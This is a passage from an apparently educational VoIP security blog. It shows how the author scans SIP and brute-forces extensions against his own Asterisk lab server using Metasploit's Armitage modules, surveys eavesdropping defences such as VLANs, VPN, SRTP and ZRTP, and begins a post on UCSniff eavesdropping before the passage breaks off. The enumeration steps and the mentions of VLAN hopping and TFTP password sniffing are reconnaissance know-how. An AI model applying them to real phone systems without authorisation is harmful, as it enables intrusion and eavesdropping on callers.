Now, I´m going to use <a href="http://www.fastandeasyhacking.com/">Armitage</a> (sorry guys, I like GUIs :P) in order to scan my network using "SIP scan (UDP)" (<a href="http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/auxiliary/scanner/sip/options.rb">auxiliary/scanner/sip/options</a>) module. It supports only OPTIONS scanning but it is enough for being the most realiable type. In fact, INVITE scan could be noisy and produce a "ring” at the other end. If you are interested in all these subjects and how they work more in depth I recommend you (as always) <a href="http://www.hackingvoip.com/">“VoIP Haking Exposed”</a> book.<br />
<br />
You only have to specify the target for configure the module, next images show the steps and the correct result.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0HJecE0AZQhQvAsW9PG2Nff4R4ikCTsPl6e2l83SHtcCFMWY4jKt93eQNjljzwpRU-lGVaLcjY71L8a3O9kTukvIXYRZceEXGM9ksNX4TuQ_p8yb7MMSHhj6EvyyLkIydiTavnq0bhnE/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="293" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0HJecE0AZQhQvAsW9PG2Nff4R4ikCTsPl6e2l83SHtcCFMWY4jKt93eQNjljzwpRU-lGVaLcjY71L8a3O9kTukvIXYRZceEXGM9ksNX4TuQ_p8yb7MMSHhj6EvyyLkIydiTavnq0bhnE/s320/2.png" width="320" /></a></div>
<br />
<div style="text-align: center;">
<span class="Apple-style-span" style="font-size: x-small;">Figure: Module configuration</span></div>
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhJHPvQ5UR9lpRF6N0IXa-4HZGrQU5iWzemj77yEVDcrS_eOoOHhlbnVLpJ5ihSsiBKeR01gNSfe3Df_YxckqvPKojosPr7lyeVSM00AA1qRRAy6auujnKwloM7F_9cs0aszYv53zkB90/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="293" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhJHPvQ5UR9lpRF6N0IXa-4HZGrQU5iWzemj77yEVDcrS_eOoOHhlbnVLpJ5ihSsiBKeR01gNSfe3Df_YxckqvPKojosPr7lyeVSM00AA1qRRAy6auujnKwloM7F_9cs0aszYv53zkB90/s320/3.png" width="320" /></a></div>
<br />
<div style="text-align: center;">
<span class="Apple-style-span" style="font-size: x-small;">Figure: Scan result</span></div>
<div style="text-align: center;">
<br /></div>
<br />
<b>Extension enumeration</b><br />
<br />
Instead of explaining how this attack works in a theorethical way (diagrams and all this stuff) I´m going to refer you to the book and show a situation which helps to understand because user/extension enumeration is possible. Firstly I will try to connect my Ekiga softphone to Asterisk server with a non existent user:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGwlSnB2Olrv6OXy5P_KdiW7Azbo5GD6jwuWBToi4VnOilGxo2bCLQs2CMU96phQKU1EgA8VSbFrhuWtkNZnwdkp16JzeAYgfZxzxG9D0iDwCtl2LbZJw-9hWIE2LRPmoaaKzKgYKCjNA/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="262" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGwlSnB2Olrv6OXy5P_KdiW7Azbo5GD6jwuWBToi4VnOilGxo2bCLQs2CMU96phQKU1EgA8VSbFrhuWtkNZnwdkp16JzeAYgfZxzxG9D0iDwCtl2LbZJw-9hWIE2LRPmoaaKzKgYKCjNA/s320/4.png" width="320" /></a></div>
<br />
<div style="text-align: center;">
<span class="Apple-style-span" style="font-size: x-small;">Figure: Bad user account configuration</span></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfNZcThgMzps-5nHLzqk8IHbZOa0mCvxODaXpr2dRxebeNYA_shQuP1WvIJRw_s5d0sNTzuhIp6NmB5E41fXACzN8EUI2w_jAhMawMhuSRbS_KjEx7lM3I6wG69juroErtuC4T-9s3cuI/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="136" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfNZcThgMzps-5nHLzqk8IHbZOa0mCvxODaXpr2dRxebeNYA_shQuP1WvIJRw_s5d0sNTzuhIp6NmB5E41fXACzN8EUI2w_jAhMawMhuSRbS_KjEx7lM3I6wG69juroErtuC4T-9s3cuI/s320/5.png" width="320" /></a></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="font-size: x-small;"><br /></span></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="font-size: x-small;">Figure: Bad login result</span></div>
<br />
Ok, Asterisk didn´t allow the connection, now we are going to try with an existent user and bad password:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggtzmxTxkqrjXvqoks5UUXlTuTHjpuAicuWu7XP3ZbI-1TCcp__Pd_KjHyfa0pAAQUuQMyGxRZbwwXZom1Vc16fjxUEc0DNSta2a1RelxmsuxAHP6Q9Nj_obx8_9VhvJrramVtsJScimA/s1600/6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="262" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggtzmxTxkqrjXvqoks5UUXlTuTHjpuAicuWu7XP3ZbI-1TCcp__Pd_KjHyfa0pAAQUuQMyGxRZbwwXZom1Vc16fjxUEc0DNSta2a1RelxmsuxAHP6Q9Nj_obx8_9VhvJrramVtsJScimA/s320/6.png" width="320" /></a></div>
<br />
<div style="text-align: center;">
<span class="Apple-style-span" style="font-size: x-small;">Figure: Correct user and bad password configuration</span></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAQ-Wo-lq_WbDkGrzzFxNu73EZ6zPk3J3GoggYI5rooN6SfroTki3Dt3oW2AvBcNTSr-B6sTmWu5y5nmXPfHCXRe2vnlcokq-ktitSmcq19HVLkzle3Dc_aOZO961fGnzuoZQ-9xAmJPk/s1600/7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="136" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAQ-Wo-lq_WbDkGrzzFxNu73EZ6zPk3J3GoggYI5rooN6SfroTki3Dt3oW2AvBcNTSr-B6sTmWu5y5nmXPfHCXRe2vnlcokq-ktitSmcq19HVLkzle3Dc_aOZO961fGnzuoZQ-9xAmJPk/s320/7.png" width="320" /></a></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="font-size: x-small;"><br /></span></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="font-size: x-small;">Figure: “Not bad” login result</span></div>
<br />
The response is different in both cases so, as you can imagine at this point, we could easily identify different extensions. In order to automate this attack we can use “SIP Username Enumerator (UDP)” module (<a href="http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/auxiliary/scanner/sip/enumerator.rb">scanner/sip/enumerator</a>) which supports REGISTER and OPTIONS scan (<i>METHOD</i> module parameter). Really it is a <a href="http://en.wikipedia.org/wiki/Brute-force_attack">Brute-force attack</a> trying specified extensions, so it is very important to specify <i><span id="goog_933815410"></span><a href="http://www.metasploit.com/modules/auxiliary/scanner/sip/enumerator">PADLEN</a><span id="goog_933815411"></span> </i>argument, if not, you could obtain a very long list of non-existent extensions. In my case I choose <i>PADLEN</i> equal to 3 because extensions are <i>101</i> and <i>102</i>, I also modifed <i>MAXENT</i> to fit with it.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi67xJqQqbNvlaxdKfsOuQcM6h1CL_8a4Z_wUybA5HCHxwzSbWDSr4nVo1WZyHrWFdQ3HPRB-YmPB8yp2Ia3r9H2MoAKRmMvG9IgFfXTafChskjNfL2ES8o0uyaAx8a9n4xL_3f4ETpaw4/s1600/8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="293" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi67xJqQqbNvlaxdKfsOuQcM6h1CL_8a4Z_wUybA5HCHxwzSbWDSr4nVo1WZyHrWFdQ3HPRB-YmPB8yp2Ia3r9H2MoAKRmMvG9IgFfXTafChskjNfL2ES8o0uyaAx8a9n4xL_3f4ETpaw4/s320/8.png" width="320" /></a></div>
<br />
<div style="text-align: center;">
<span class="Apple-style-span" style="font-size: x-small;">Figure: Enumerator module configuration</span></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgl1wcZQncigWcBJAixT2IFyayRooyAHL7HunAK35KmOd_uRSiIw6HxQmK5-E70-VIzYCzwhsANF2teztwk8O2RcOtFrs5AJOfX4FTvQefvd8AUhkTh-y2WbcqyPfiz5YCMna0XPEBRKAM/s1600/9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="293" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgl1wcZQncigWcBJAixT2IFyayRooyAHL7HunAK35KmOd_uRSiIw6HxQmK5-E70-VIzYCzwhsANF2teztwk8O2RcOtFrs5AJOfX4FTvQefvd8AUhkTh-y2WbcqyPfiz5YCMna0XPEBRKAM/s320/9.png" width="320" /></a></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="font-size: x-small;"><br /></span></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="font-size: x-small;">Figure: REGISTER extension enumeration result</span></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDXUzApWkEQc3QWABekES3y8Q2TyIWL-kUC1Di02mMqm4GtHThqtV2_ozNjK7LYMEd8SpHX_iV1JmqLbOmvKS2le78WZp6uD5u2eMA-8SdyyCls1eoEE4_8LH7MyXtEyi9JrwDSvggy9A/s1600/10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="293" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDXUzApWkEQc3QWABekES3y8Q2TyIWL-kUC1Di02mMqm4GtHThqtV2_ozNjK7LYMEd8SpHX_iV1JmqLbOmvKS2le78WZp6uD5u2eMA-8SdyyCls1eoEE4_8LH7MyXtEyi9JrwDSvggy9A/s320/10.png" width="320" /></a></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="font-size: x-small;"><br /></span></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="font-size: x-small;">Figure: OPTIONS extension enumeration result</span></div>
<br />
As you can see I got different results, on one side OPTIONS scan identified extensions <i>500</i> (Asterisk demo) and <i>600</i> (echo demo) and REGISTER scan got real extensions on the other. So it would be necessary to use both types during a pentest process.<br />
<br />
At this moment Metasploit does not support Asterisk Exchange protocol (this is also part of VoIP protocols as SIP) scan. We have <a href="http://sourceforge.net/projects/enumiax/">enumIAX</a> and <a href="http://code.google.com/p/iaxscan/">iaxscan</a> classic tools, but we are only focus in SIP protocol at this time.<br />
<br />
Information gathering coutermeasurements is a very interesting subject but I think it is enough for today, typical solutions are <a href="http://ofps.oreilly.com/titles/9780596517342/asterisk-Security.html">Fail2ban combined with Iptables</a> and <a href="http://www.opensips.org/html/docs/modules/1.6.x/pike.html">other specific tools</a> for each type of VoIP system.<br />
<br />
<div style="text-align: right;">
Jesús Pérez</div>Anonymoushttp://www.blogger.com/profile/09565740223441207640noreply@blogger.comtag:blogger.com,1999:blog-7743819158194184549.post-87830676656738701972011-08-26T12:17:00.002+02:002012-02-15T10:36:46.466+01:00VoIP Eavesdropping: Counter MeasurementsAs we seen in <a href="http://nicerosniunos.blogspot.com/2011/08/voip-eavesdropping-ucsniff-ii.html">two last posts</a> <a href="http://en.wikipedia.org/wiki/Session_Initiation_Protocol">SIP</a>(Sesion Initiation Protocol) is a protocol easily sniffeable because of being transmitted unencrypted over the net. There are some solutions which solve this, but they are not definitive. Next picture show a very basic diagram of one VoIP infrastructure which I will use along this post, at this point we should understand <span id="goog_851462026"></span>SIP is used for creating, modifying and terminating sessions and this sessions are formed for one or several <a href="http://en.wikipedia.org/wiki/Streaming_media">media streams</a> and they occurs between clients, leaving <a href="http://www.webopedia.com/TERM/S/SIP_proxy.html">SIP Proxy</a> aside.<br />
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTijo_gRnJ7k7Ccg66-HL1cJHQ29NCw7fqHHrSN-UOu8jPIxqEyZwLl2F_eExUjUhManDTz0csaYFtfRdPXTMDKcUtJzOgPz8glhowGjiwFfbClNSGctQDe2DhdL9GPY21YiBP2zz_o3o/s1600/0.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="146" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTijo_gRnJ7k7Ccg66-HL1cJHQ29NCw7fqHHrSN-UOu8jPIxqEyZwLl2F_eExUjUhManDTz0csaYFtfRdPXTMDKcUtJzOgPz8glhowGjiwFfbClNSGctQDe2DhdL9GPY21YiBP2zz_o3o/s320/0.png" width="320" /></a></div>
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<div style="text-align: center;">
<span class="Apple-style-span" style="font-family: inherit; font-size: x-small;">Figure: Basic VoIP network infrastructure</span></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span></div>
<span class="Apple-style-span" style="font-family: inherit;">Mainly we have two options in order to avoid Eavesdropping attacks: <b>encryption</b> or <b>network separation</b>.</span><br />
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: inherit;"><b>Network separation</b></span><br />
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: inherit;">It´s too difficult to own necessary resources to separate physically VoIP network of organization data network. The common solution is to use managed switches and setup different <a href="http://en.wikipedia.org/wiki/Virtual_LAN">VLANs</a></span> (Virtual Private Networks).<br />
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: inherit;">But this is only applicable inside your LAN and there are a lot of techniques for evading this kind of switches control which allow the attacker hop between different VLANs, we can find them with a simple search on Google:</span><br />
<span class="Apple-style-span" style="font-family: inherit;"><a href="http://www.google.es/search?sourceid=chrome&ie=UTF-8&q=vlan+hop">http://www.google.es/search?sourceid=chrome&ie=UTF-8&q=vlan+hop</a></span><br />
<span class="Apple-style-span" style="font-family: inherit;">In fact, software used in previous posts supports it for some Cisco routers as showed in the picture:</span><br />
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZrBJyKdyY-Jow_pgLvwLx8Ga5KeyaWI_t1DHaHhfNH_i6Oas_xuC_UsNQw2lp_Cd_SyflhdVr4tIQl_ovJS-LS-THRYYkOssPuuhO53adInNDC75vBJaGKgSkCDkUUFi1xA9aEiQy0HI/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="265" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZrBJyKdyY-Jow_pgLvwLx8Ga5KeyaWI_t1DHaHhfNH_i6Oas_xuC_UsNQw2lp_Cd_SyflhdVr4tIQl_ovJS-LS-THRYYkOssPuuhO53adInNDC75vBJaGKgSkCDkUUFi1xA9aEiQy0HI/s320/1.png" width="320" /></a></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="font-family: inherit; font-size: x-small;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: inherit; font-size: x-small;">Figure: UCSniff VLAN hop</span></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span></div>
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: inherit;"><b>Encryption</b></span><br />
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: inherit;">In this case we have some options too:</span><br />
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: inherit;">- <b>VPN</b>(<a href="http://en.wikipedia.org/wiki/Virtual_private_network">Virtual Private Network</a>): As you can see in the figure it is possible to cypher communications between different VoIP terminals of your system using a VPN, if all traffic is encrypted both SIP and RTP are also protected. This solution defends us from Internet sniffers but not inside the organization, this is the reason because a dedicated VLAN is also recommended in order to minimize data exposure. </span><br />
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0x-rKE4GqMJuU4K_zOvheYln8kQUzEPrQhm3jjRsyWPvKRqzNGzKAlfytQ0i4vxE4EzYP1SlTxo1HqLl5vP4GO0LcUkyK7J3E0xgzoNehaXBLoh53SIh8wtrmjSgvhnklSpBqKYmCGvU/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="139" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0x-rKE4GqMJuU4K_zOvheYln8kQUzEPrQhm3jjRsyWPvKRqzNGzKAlfytQ0i4vxE4EzYP1SlTxo1HqLl5vP4GO0LcUkyK7J3E0xgzoNehaXBLoh53SIh8wtrmjSgvhnklSpBqKYmCGvU/s320/2.png" width="320" /></a></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="font-family: inherit; font-size: x-small;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: inherit; font-size: x-small;">Figure: VPN example</span></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span></div>
<span class="Apple-style-span" style="font-family: inherit;">- <b>Built encryption</b>: Some proprietary software as <a href="http://www.skype.com/">Skype</a> uses its own cipher protocol, only understandable for Skype clients. Traffic is encrypted and <a href="http://en.wikipedia.org/wiki/Skype_protocol">protocol</a> relies on a P2P network formed for clients and nodes, but this architecture is too complex for resume it in a few words, so I recommend the lecture of these papers:</span><br />
<span class="Apple-style-span" style="font-family: inherit;"><a href="http://www.linecity.de/INFOTECH_ACS_SS05/acs5_top1_paper.pdf">http://www.linecity.de/INFOTECH_ACS_SS05/acs5_top1_paper.pdf</a></span><br />
<span class="Apple-style-span" style="font-family: inherit;"><a href="http://www.mjalali.com/blog/?p=10.">http://www.mjalali.com/blog/?p=10</a></span><br />
<span class="Apple-style-span" style="font-family: inherit;">Anyway, I wouldn’t use it if I want a real secure communication because i can´t be sure if my conversation is not being transmitted using another Skype user computer(maybe a bad guy one).</span><br />
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: inherit;">- <b>“Standards” SRTP & ZRTP</b>: <b><a href="http://en.wikipedia.org/wiki/Secure_Real-time_Transport_Protocol">SRTP</a></b>(Secure Real Time Transport Protocol) cyphers <a href="http://es.wikipedia.org/wiki/Real-time_Transport_Protoco">RTP</a> traffic to provide encryption, message authentication and integrity and replay protection. It depends of an external key management protocol to set up the initial master key, there are some other protocols to do this task: <b><a href="http://en.wikipedia.org/wiki/MIKEY">MIKEY</a></b>, <a href="http://en.wikipedia.org/wiki/ZRTP"><b>ZRTP</b></a>(Media Path Key Agreement for Unicast Secure RTP) and <b><a href="http://en.wikipedia.org/wiki/SDES">SDES</a></b> which seems to become de facto standard, principally for being an extremely simple technique. Basically, in this method keys are transported in a SIP message (SDP attachment) and ciphered using TLS(<a href="http://en.wikipedia.org/wiki/Transport_Layer_Security">Transport Layer Security</a>), you can imagine it if you think in <a href="http://en.wikipedia.org/wiki/HTTP_Secure">HTTPS</a> protocol. Also it could be possible to use other methods to implement this last funcionality like <a href="http://es.wikipedia.org/wiki/S/MIME">S/MIME</a> but they are not too much widespread.</span><br />
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8KRbw3oYumJSiwrAndxMEwyfNBNJj0E7rDf-VMdrJQyTLGBzxsgKRjWlQ0wYi2H284YFL-vwyzu3xDUMbIE7W3mHqWIK_D0Kkmwjj3u2HWplqt2vsmZh9uPDltC-GN9yqxh9mEFAPc6Y/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="147" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8KRbw3oYumJSiwrAndxMEwyfNBNJj0E7rDf-VMdrJQyTLGBzxsgKRjWlQ0wYi2H284YFL-vwyzu3xDUMbIE7W3mHqWIK_D0Kkmwjj3u2HWplqt2vsmZh9uPDltC-GN9yqxh9mEFAPc6Y/s320/3.png" width="320" /></a></div>
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<div style="text-align: center;">
<span class="Apple-style-span" style="font-family: inherit; font-size: x-small;">Figure: TLS example</span></div>
<div style="text-align: center;">
<br /></div>
<span class="Apple-style-span" style="font-family: inherit;">On the other hand, ZRTP was developed as part of <a href="http://zfoneproject.com/prod_zfone.html">Zfone Project</a> and its most important advantage is the only able to provide <a href="http://en.wikipedia.org/wiki/End-to-end_encryption">end-to-end encryption</a>. Even SIP/TLS does not provide it because being the <a href="http://en.wikipedia.org/wiki/IP_PBX">IP PBX</a> a trusted third party which could be able to eavesdrop the conversation. Other benefits of this protocol:</span><br />
<span class="Apple-style-span" style="font-family: inherit;">- It uses a <a href="http://en.wikipedia.org/wiki/Public-key_cryptography">public key algorithm</a> avoiding <a href="http://en.wikipedia.org/wiki/Public_key_infrastructure">PKI</a>(Public Key Infrastructure) complexity.</span><br />
<span class="Apple-style-span" style="font-family: inherit;">- It allows the detection of man-in-the-middle (MiTM) attacks, as commented before.</span><br />
<span class="Apple-style-span" style="font-family: inherit;">- It supports <a href="http://en.wikipedia.org/wiki/Opportunistic_encryption">opportunistic encryption</a> asking the other VoIP client if supports ZRTP before starting a call.</span><br />
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIq3LRYKbeA8S7H_6jJmIJu4UFzznLlrsr4Uf8I6JTEHJQdla7Te1n_IJLNL3SyyP1tMogwQFJ1DGHeKW6Ez-mFW0CpREiULkJ2g41V7BeF8ubEUt0iXfTHayk8OYhcZP6568QGelWcAw/s1600/4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="229" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIq3LRYKbeA8S7H_6jJmIJu4UFzznLlrsr4Uf8I6JTEHJQdla7Te1n_IJLNL3SyyP1tMogwQFJ1DGHeKW6Ez-mFW0CpREiULkJ2g41V7BeF8ubEUt0iXfTHayk8OYhcZP6568QGelWcAw/s320/4.jpg" width="320" /></a></div>
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<div style="text-align: center;">
<span class="Apple-style-span" style="font-family: inherit; font-size: x-small;">Figure: Detailed SRTP generic communication</span></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span></div>
<span class="Apple-style-span" style="font-family: inherit;">NOTE: Eavesdropping through ZRTP protocol seems extremely difficult, but not impossible. To do this, an attacker would have to be present since the first call, be able to fake verbal <a href="http://www.audiocodes.com/glossary/sas">SAS</a> in real time and, preferably, to imitate voices. (Detailed explanation <a href="http://voipsa.org/blog/2006/06/19/a-tour-through-zfone/">here</a>)</span><br />
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: inherit;">They are not exactly standards but they are the most used option, in fact, SRTP(<a href="http://tools.ietf.org/html/rfc4585">RFC4585</a>)</span> and MIKEY (<a href="http://tools.ietf.org/html/rfc4738">RFC4738</a>) are “Proposed standard” and ZRTP is an “Informational standard”. It was developed by <a href="http://en.wikipedia.org/wiki/Phil_Zimmermann">Phil Zimmermann</a> (among others) and published by <a href="http://en.wikipedia.org/wiki/Internet_Engineering_Task_Force)(Internet%20Engineering%20Task%20Force">IETF</a> recently as <a href="http://tools.ietf.org/html/rfc6189">RFC 6189</a>.<br />
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: inherit;">Ok, this is a real mess of protocols, but now, what hardware and software solution would I get? You should choose what level of risk you want to assume, and then select software that supports it, I think this comparative list can help you:</span><br />
<a href="http://en.wikipedia.org/wiki/Comparison_of_VoIP_software">http://en.wikipedia.org/wiki/Comparison_of_VoIP_software</a><br />
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlaQFZBURmd0K7vcVjq6_1C35hTMta6l1Sd9VIkz1q4S_SfMR_b32FhHLft2oS3jaEpxIyL4nhUFgdqJKwR8QXQesvWsax_E0rUTJS7YNVDQ1SG1ZhDzrr1DYOSmeB4Hfkly-N6FTD26c/s1600/T_Ekiga_in_a_Call.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlaQFZBURmd0K7vcVjq6_1C35hTMta6l1Sd9VIkz1q4S_SfMR_b32FhHLft2oS3jaEpxIyL4nhUFgdqJKwR8QXQesvWsax_E0rUTJS7YNVDQ1SG1ZhDzrr1DYOSmeB4Hfkly-N6FTD26c/s320/T_Ekiga_in_a_Call.png" width="281" /></a></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="font-family: inherit; font-size: x-small;">Figure: Ekiga client </span></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span></div>
<span class="Apple-style-span" style="font-family: inherit;">To sum up I should to say I know this was a bored(sorry for that) theoretical post, but I found a lot of confusion in too many sites and forums among this group of protocols and what they can do for us, so I decided deep in and document it. From now I will come back to work on proofs of concept which are much more funny to test, write and read :)</span><br />
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<div style="text-align: right;">
<span class="Apple-style-span" style="font-family: inherit;">Jesús Pérez</span></div>Anonymoushttp://www.blogger.com/profile/09565740223441207640noreply@blogger.comtag:blogger.com,1999:blog-7743819158194184549.post-22356360360984584732011-08-17T22:05:00.003+02:002012-02-11T18:14:51.045+01:00VoIP Eavesdropping: UCSniff (II)<span class="Apple-style-span" style="font-family: inherit;"><a href="http://www.google.com/url?q=http%3A%2F%2Fnicerosniunos.blogspot.com%2F2011%2F08%2Fvoip-eavesdropping-ucsniff-i.html"> VoIP Eavesdropping: UCSniff (I)</a></span><br />
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: inherit;">To start this second article I'll dig a little deeper in VoIP Eavesdropping techniques. </span>There are different classifications over the net but I´m going to use <a href="http://www.hackingvoip.com/">"Hacking Exposed VoIP"</a> book (I strongly recommend it) one for being , in my opinion, the most complete. According to it we define four categories for these attacks:<br />
<br />
<span class="Apple-style-span" style="font-family: inherit;"><b>TFTP Configuration File Sniffing</b></span><br />
IP phones often obtain their configuration parameters from a TFTP server, you can get an idea imagining something similar to DHCP Protocol, but in application layer of course. In this case attacker could obtain some passwords sniffing or downloading them directly from ftp server, moreover he could even reconfigure phone. In fact I have a fun idea in mind for another POC but we are waiting for someone to lend us a proper phone :).<br />
<br />
<span class="Apple-style-span" style="font-family: inherit;"><b>Number Harvesting</b></span><br />
Attacker monitors all calls in order to obtain legitimate numbers and extensions of a system which will be used combined with other attacks.<br />
<br />
<span class="Apple-style-span" style="font-family: inherit;"><b>Call Pattern Tracking </b></span><br />
The attack target is the list with all the calls made by a member of an organization in order to detect suspicious activities among the members.<br />
<br />
<b>Conversation Eavesdropping and Analysis</b><br />
This is the most impressive attack because the bad guy try to record both sides of conversations.<br />
<br />
That being said, now I´m going to show <a href="http://ucsniff.sourceforge.net/">UCSniff</a> automates the attacks studying results obtained from <a href="http://www.google.com/url?q=http%3A%2F%2Fnicerosniunos.blogspot.com%2F2011%2F08%2Fvoip-eavesdropping-ucsniff-i.html">last post</a>. Next picture shows files generated after the sniffing.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
